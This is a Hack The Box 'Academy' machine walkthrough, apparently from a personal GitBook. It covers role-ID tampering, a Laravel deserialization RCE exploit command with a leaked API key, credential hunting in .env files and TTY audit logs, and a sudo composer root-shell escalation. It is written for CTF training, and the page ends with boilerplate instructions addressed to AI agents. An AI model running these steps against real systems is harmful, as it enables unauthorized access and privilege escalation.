# Academy Synopsis Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost, that is found to be running on Laravel. Laravel debug mode is enabled, the exposed API Key and vulnerable version of Laravel allow us carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel .env file for another application reveals a password that is found to work for the cry0l1t3 user, who is a member of the adm group. This allows us to read system logs, and the TTY input audit logs reveals the password for the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo , which we can leverage in order to escalate our privileges

## Reconaissance ### nmap : As usual starting by scanning open ports and running services using nmap ```python nmap -sC -sV -oA nmap/adademy 10.10.10.100 ```

add academy.htb to the /etc/hosts file `echo "10.10.10.215 academy.htb" >> /etc/hosts` and then open the website in the browser ## Enumeration ### Directory enumeration using dirsearch : ```python dirsearch -u http://academy.htb -x 403 ```

first let's register an account

when performing a simple register we are redirected to the login page and after login to the home page where you can purchase modules but if we go to the directory /admin.php we will find a login page but if we enter the credentials of the account we have registered it will not accept it and this is because the application is using some role authorization mechanism when registring enter username and password and before submitting intercept request using burp so we can notice that there is HTTP Post parameter called roleid which is set by default to 0

let's try to set it to another value to get another role in the application let's set it to 1 and send the request

after we registered an account with different role id let's go the login page at `/admin.php` and login with the manipulated account

and boom we are admin now

in this table there is virtual host `dev-staging-01.academy.htb` let's add it to the file /etc/hosts

if we visit this virtual host on the browser we will find that this page is using laravel framework and it has debug mode and there leaked environement variables like the API\_KEY

## Gain an Initial Foothold searching for any `laravel exploits` using **searchsploit** we find a couple ones looking for each one of them in exploitDB we find that the **token unserialize RCE** exploit needs a valid API\_key to work which we have and also requires the debug mode to be enabled

to exploit this vulnerability in laravel we can use a github exploit {% embed url="" %} you will find the installation guide in this repository * **URL :** * **API\_KEY :** dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

```python python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -i ```

## Lateral Movement -> cry0l1t3 enumerating the box we can find a hidden environement variable file in the website files located at `/var/www/html/academy/.env` which contains cry0l1t3 password

now let's use this password to login as cry0l1t3 (after testing this password against all /etc/passwd users that have /bin/bash we found that this password is cry0l1t3's password)

## Lateral Movement ->mrb3n let's which groups this user belong to

let's find all files and directories owned by the group "adm"

so the adm group owns a lot of log files that means that all members of this group have the right to read the logs, let's read those logs and see if anything interesting appears after reading the logs manually i couldn't find anything of interest so i used a tool called aureport which is a tool that produces a summary report of system logs {% embed url="" %} * **--tty :** Report about tty keystrokes which may include plaintext passwords

now let's ssh as the user mrb3n

## Privelege Escalation performing manual enumration on the box we find that the user mrb3n can run the composer command using sudo

according to gtfobins we can abuse the command composer to get a privilege escalation on the machine {% embed url="" %}

```python TF=$(mktemp -d) echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json sudo composer --working-dir=$TF run-script x ```

hope you found this walkthrough easy to understand and follow Greeting From [Sayonara](https://github.com/ismail-arame) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/hackthebox/machines/academy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.